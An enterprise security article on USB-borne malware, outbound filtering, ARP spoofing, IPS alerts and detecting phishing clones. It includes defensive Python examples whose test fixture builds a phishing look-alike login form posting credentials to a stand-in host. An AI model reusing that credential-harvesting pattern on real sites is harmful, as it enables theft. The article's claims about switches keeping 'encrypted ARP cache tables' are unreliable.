We are all well aware of the importance of securing an enterprise's IT setup and of the measures to be taken to protect it against the various security threats. Yet every year we hear of one security disaster or another that has struck a reputed organization, and the reason is always the same: we don't update our security solutions regularly. Security devices and practices are not something you install once and forget about the next day; you need to revisit them regularly. Even a minute change in the IT infrastructure would require a complete changeover in your security policies. For instance, imagine you have a web server running in your organization and your e-mail server is outsourced/hosted, and now you decide to move the mail server into your own datacenter as well. In such a scenario the perimeter security you have might need a complete makeover, so that it can cope with the risks a mail server brings that were not there with only a web server. Intel co-founder Andrew S. Grove once said, 'Only the paranoid survive.' We have to be paranoid about security to survive the new threats that are born every day. This story talks about some of the most common and uncommon threats that your enterprise faces each day, and the best approaches to combat them.
Blocking the gaping holes
As it is vital to safeguard your house at its entry points, it is equally important to protect your IT infrastructure at every possible point of attack. But to do so, you first have to understand what the entry points into your IT infrastructure could be. The Internet or broadband gateway is not the only point of entry for hackers. Hackers and worms are pretty smart now and know that people today use a firewall to restrict unwanted incoming connections, so they focus instead on other ways of getting into the network. And once they are in, they can open channels and ports through your Internet connection to go out and connect to the outside world.
Even a simple USB pen drive could be that entry point. These drives are capable of 'autorun' and are plugged into many machines every single day, and hence can get infected very easily. Visitors come to us with their own USB drives full of data and share it with us by copying it onto our production machines. If that USB drive is compromised, it can easily plant a worm, a virus or a rootkit on a machine, and once planted, the malware can start spreading across the network and infecting other machines. That's not all: these viruses can open channels from your PC to hacker machines and then start uploading sensitive data. Not just pen drives but also portable devices such as digital cameras, laptops, mobile phones, PDAs and handhelds all pose the same threat.
So you must be wondering how to protect your infrastructure from these threats. One option is to ban all portable data transfer devices in your organization, which many enterprises are actually doing. But that is not the right approach, as by doing so you completely give up the use of a great technology. Instead you should deploy solutions that take care of the risk while letting you keep the benefits of such portable devices.
Tools such as EtherApe are very handy for quickly spotting worm attacks that flood the network. In one shot you can see the infected nodes.
Another solution is a good endpoint security solution. Essentially an endpoint solution is nothing but an antivirus/antispyware agent which sits on all the workstations and laptops (even on mobile phones, for that matter) but connects back to a centralized server for upgrades, deployments and logging/reporting. There are plenty of such solutions available from different vendors such as Symantec, MicroWorld, Quick Heal, etc.
Another way of protecting against such attacks is to deploy a firewall or a UTM solution which scans not only inbound (incoming) traffic but also outbound (outgoing) traffic. This makes sure that if by chance any malware or virus has entered your network and already spread itself, the device prevents it from opening ports and channels to hackers' websites, from inviting more worms in, and from uploading sensitive data. There are quite a few organizations that offer such UTM/firewall solutions which scan both inbound and outbound traffic; some examples are Cyberoam, GajShield, etc.
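As an added example (not code from the article or from any UTM vendor named in it), here is the outbound-scanning idea in miniature: a small egress-policy check run over constructed firewall log lines, flagging internal hosts that reach the outside directly instead of through the proxy and resolver, and singling out a host that fans out to several outside addresses in a short window, which is how a worm or a data-upload channel typically looks. The network ranges, relay hosts and log format are assumptions.

```python
"""Egress policy check over constructed firewall log lines.
Assumed policy: internal hosts (10.0.0.0/8) reach the outside world only
through the proxy (10.0.0.5) and the DNS resolver (10.0.0.2). Any other host
opening a direct outbound connection violates the policy."""
import ipaddress
from collections import defaultdict

INTERNAL = ipaddress.ip_network("10.0.0.0/8")
EGRESS_HOSTS = {"10.0.0.5", "10.0.0.2"}   # only hosts allowed to go out directly

# Constructed log lines: "<epoch> <src_ip> <dst_ip> <dst_port>"
SAMPLE_LOG = """\
100 10.0.0.20 10.0.0.5 3128
101 10.0.0.20 10.0.0.2 53
102 10.0.0.21 203.0.113.9 6667
103 10.0.0.21 198.51.100.4 6667
104 10.0.0.21 192.0.2.77 25
105 10.0.0.21 203.0.113.10 445
106 10.0.0.5 203.0.113.9 443
110 10.0.0.22 10.0.0.30 445
""".splitlines()

def parse_line(line):
    ts, src, dst, port = line.split()
    return int(ts), src, dst, int(port)

def check_egress(lines, fanout_limit=3, window=30):
    """Return (kind, src, detail) findings in log order.
    'direct' = an internal host bypassed the relays to reach the outside;
    'fanout' = it reached fanout_limit distinct outside hosts within `window`
    seconds (reported once, when the limit is first hit)."""
    findings = []
    outside_seen = defaultdict(list)   # src -> [(ts, dst), ...] recent outside contacts
    for line in lines:
        ts, src, dst, port = parse_line(line)
        if ipaddress.ip_address(src) not in INTERNAL:
            continue                   # inbound traffic: the perimeter rules' job
        if ipaddress.ip_address(dst) in INTERNAL or src in EGRESS_HOSTS:
            continue                   # internal-to-internal, or a permitted relay
        findings.append(("direct", src, f"{dst}:{port}"))
        recent = [(t, d) for t, d in outside_seen[src] if ts - t <= window]
        recent.append((ts, dst))
        outside_seen[src] = recent
        if len({d for _, d in recent}) == fanout_limit:
            findings.append(("fanout", src, f"{fanout_limit} outside hosts in {window}s"))
    return findings
```

In the sample, 10.0.0.21 never touches the proxy and instead opens connections straight to four outside hosts on IRC, SMTP and SMB ports, so it is reported both per connection and once for the fan-out.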
The threat within
According to a survey we did in January last year, internal security threats can sometimes be more deadly than external ones. This is a very crucial point to remember. A disgruntled employee could give strategic information to your competition, and it could even be done by an innocent employee unknowingly. Such cases are equally dangerous and need to be tackled differently. Just imagine an employee turning hostile and passing strategic business information to the competition. It is a spine-chilling thought, but it can become a reality at some point in time.
To learn how you can protect your IT infrastructure from such threats, the first thing to do is to understand the difference between an internal and an external attack. There are essentially two types of attacks which someone sitting inside the network can perform and which rarely come from an outsider: Ethernet sniffing and spoofing. The former means promiscuously listening to the traffic flowing on the network and gathering data from it, while the latter means faking the identity of some other machine to access data intended for that machine. Both are very serious scenarios that could result in the loss of precious data.
The solutions for such issues are twofold: either you secure the data or you secure the medium. To secure the data, you have to encrypt each and every piece of sensitive data travelling across the network. For example, your mail, passwords, files, etc. all have to be encrypted whenever they are copied or transferred over the network.
A non-traditional way to check whether your site is being faked for a phishing attack is to use an online plagiarism-checking website to find replicas of your site's content.
And to secure the medium, you have to replace your network switches with ones that are more secure. Yes, there are network switches which are secure and others which are not. To understand this, you first have to understand how data is switched inside a network switch. For switching data, all switches have a cache table called the ARP cache table, which keeps a log of all the machines connected to the switch as pairs of each machine's IP and MAC addresses. For spoofing data, a hacker manipulates this entry and changes the IP-MAC pair, which is called an ARP flip-flop.
To protect against such attacks there are switches which provide an encrypted ARP cache table, which hence can't be manipulated or read by hacking machines. These secure switches are easily available from most switch vendors but are slightly heavy on your pocket.
You obviously can't change your complete IT infrastructure by deploying new switches, and at the same time it may not be feasible to encrypt all data traveling on your network. In such a case, you can deploy an inward-facing IPS solution with alerts. This IPS is essentially an intrusion detection and prevention system which checks for all types of spoofing, sniffing and other attacks on the network and alerts you in case of a problem. It also tells you the source and destination of the attack, and once you have the source of such an attack you can catch the attacker red-handed. You can get an IPS solution as part of a UTM solution or opt for a stand-alone IPS system. Snort is one of the most famous IPS systems for wired networks, and Kismet is a renowned solution in the wireless domain.
However, while deploying an IPS solution you should always configure alerts so that there is minimal delay between generation and delivery of the alert. An SMS alert, for instance, will be the quickest of the lot.
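To make the ARP flip-flop and the inward-facing IPS alert concrete, here is an added example (not part of the article, and not Snort's or any vendor's code): a detector that tracks which MAC address answers for each IP and raises an alert, with the old and new MAC, when the pair starts flipping. The ARP records, addresses and thresholds are constructed for the example.

```python
"""Detect ARP flip-flops: an IP address that suddenly answers from a different
MAC address, which is what an ARP poisoning run looks like from the wire.
Runs over constructed ARP reply records (no live capture); in a deployment
the records would come from a sniffer on a switch mirror port."""
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpReply:
    ts: int     # seconds since start of capture (constructed)
    ip: str     # sender protocol address: the IP the sender claims to own
    mac: str    # sender hardware address

# Constructed sample: 10.0.0.1 is the gateway at aa:..:01. From t=30 a second
# host (cc:..:03) starts claiming the gateway IP while the real gateway keeps
# answering too, so the IP-MAC pair flips back and forth.
SAMPLE_REPLIES = [
    ArpReply(0,  "10.0.0.1",  "aa:aa:aa:aa:aa:01"),
    ArpReply(5,  "10.0.0.20", "bb:bb:bb:bb:bb:02"),
    ArpReply(30, "10.0.0.1",  "cc:cc:cc:cc:cc:03"),
    ArpReply(31, "10.0.0.1",  "aa:aa:aa:aa:aa:01"),
    ArpReply(32, "10.0.0.1",  "cc:cc:cc:cc:cc:03"),
    ArpReply(40, "10.0.0.20", "bb:bb:bb:bb:bb:02"),
]

def detect_flipflops(replies, window=60, threshold=2):
    """Return alert dicts naming the contested IP, the MAC previously seen for
    it and the MAC now claiming it (the source/target an IPS should report).
    The first change is reported as 'changed' (a NIC swap looks the same);
    `threshold` or more changes within `window` seconds is a 'flipflop'."""
    last_mac = {}                     # ip -> MAC most recently seen answering
    changes = defaultdict(list)       # ip -> timestamps of recent MAC changes
    alerts = []
    for r in replies:
        prev = last_mac.get(r.ip)
        if prev is not None and prev != r.mac:
            recent = [t for t in changes[r.ip] if r.ts - t <= window] + [r.ts]
            changes[r.ip] = recent
            alerts.append({"ts": r.ts, "ip": r.ip, "old_mac": prev, "new_mac": r.mac,
                           "kind": "flipflop" if len(recent) >= threshold else "changed"})
        last_mac[r.ip] = r.mac
    return alerts

if __name__ == "__main__":
    for a in detect_flipflops(SAMPLE_REPLIES):
        print(f"{a['kind']:8} t={a['ts']:<3} {a['ip']} {a['old_mac']} -> {a['new_mac']}")
```

Each alert dict is what you would hand to the SMS or e-mail notifier; the 'changed' severity exists so that a legitimate hardware replacement does not page anyone at night.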
Faking of identity
Phishing or faked websites are always a key concern for users doing online transactions, but they are a bigger concern for enterprises that own websites which can be phishing targets. When a site is phished, the matter is out of the control of the owner of the actual site, who doesn't even know that the site has been phished unless someone reports a scam about it. Such phishing sites are the biggest cause of loss of reputation for the websites they copy.
So, if you own a website that is vulnerable to phishing, you must start thinking about measures to prevent it. Yes, you will have to secure your site with digital certificates from known certification authorities, and you will need to introduce multifactor authentication for your users and customers.
But beyond all this there is another easy way to keep track of which sites are trying to phish your website. The technique doesn't use any security device or application; rather it works on the great power of today's search engines.
A simple search on the net will turn up lots of free and commercial web-based plagiarism detection tools. Essentially these tools are used for checking whether copyrighted material has been copied across websites. Such tools take each and every sentence on a website and search for matching sentences on other websites indexed by a given search engine.
During phishing, the attacker copies the actual website to create an exact replica in terms of look and feel, and so must be using the same text as the real site.
If you run your website through a plagiarism checker, it should show you all websites with the same text, including those that are likely to be phishing websites. This technique works pretty well for websites with fewer images and animations and more text.
One such free website where you can check for plagiarism is http://copyscape.com. It gives you 10 tries in a month, which should be good enough for a regular check.
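An added example (not from the article, and not how Copyscape works internally) of the same idea run offline: it extracts the visible sentences of your own page and scores candidate pages by how much of their text is copied verbatim, so a look-alike that only changed where the login form posts still scores as a replica. The three HTML pages are constructed samples; in practice the candidates would be the pages a search engine returns for your distinctive sentences.

```python
"""Offline version of the plagiarism-checker trick: fingerprint the visible
text of your own page as a set of sentences, then score candidate pages by
how many of their sentences appear verbatim on yours. Pages are constructed."""
import re
from html.parser import HTMLParser

class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""
    def __init__(self):
        super().__init__()
        self.skip, self.chunks = 0, []
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self.skip:
            self.skip -= 1
    def handle_data(self, data):
        if not self.skip:
            self.chunks.append(data)

def sentences(html):
    """Visible text as a set of normalised sentences (lower-case, >= 4 words)."""
    p = _TextExtractor()
    p.feed(html)
    p.close()
    text = re.sub(r"\s+", " ", " ".join(p.chunks))
    return {s.strip().lower() for s in re.split(r"(?<=[.!?])\s+", text)
            if len(s.split()) >= 4}

def replica_score(original_html, candidate_html):
    """Fraction of the candidate's sentences copied verbatim from the original."""
    ours, theirs = sentences(original_html), sentences(candidate_html)
    return len(ours & theirs) / len(theirs) if theirs else 0.0

def likely_replicas(original_html, candidates, threshold=0.8):
    """Names of candidate pages whose score reaches the threshold."""
    return [name for name, html in candidates.items()
            if replica_score(original_html, html) >= threshold]

ORIGINAL = """<html><body><h1>Example Bank</h1>
<p>Welcome to Example Bank online banking. Please enter your customer number and password to continue.</p>
<p>Never share your password with anyone. Our staff will never ask for it by e-mail.</p>
<form action="/login"><input name="user"><input name="pass" type="password"></form>
</body></html>"""
# Look-alike: identical text, only the form posts elsewhere plus a tracker script.
LOOKALIKE = (ORIGINAL.replace('action="/login"', 'action="http://collect.invalid/l"')
             .replace("</form>", "</form><script>x=1</script>"))
# Unrelated page that happens to share one generic sentence with the original.
UNRELATED = """<html><body><p>Never share your password with anyone. Read our weekly newsletter for garden tips and recipes. Back issues are available in the archive.</p></body></html>"""
```

Because only visible text is compared, the threshold is what separates a genuine copy from a page that merely reuses a stock sentence, which is also why the technique works best on text-heavy sites.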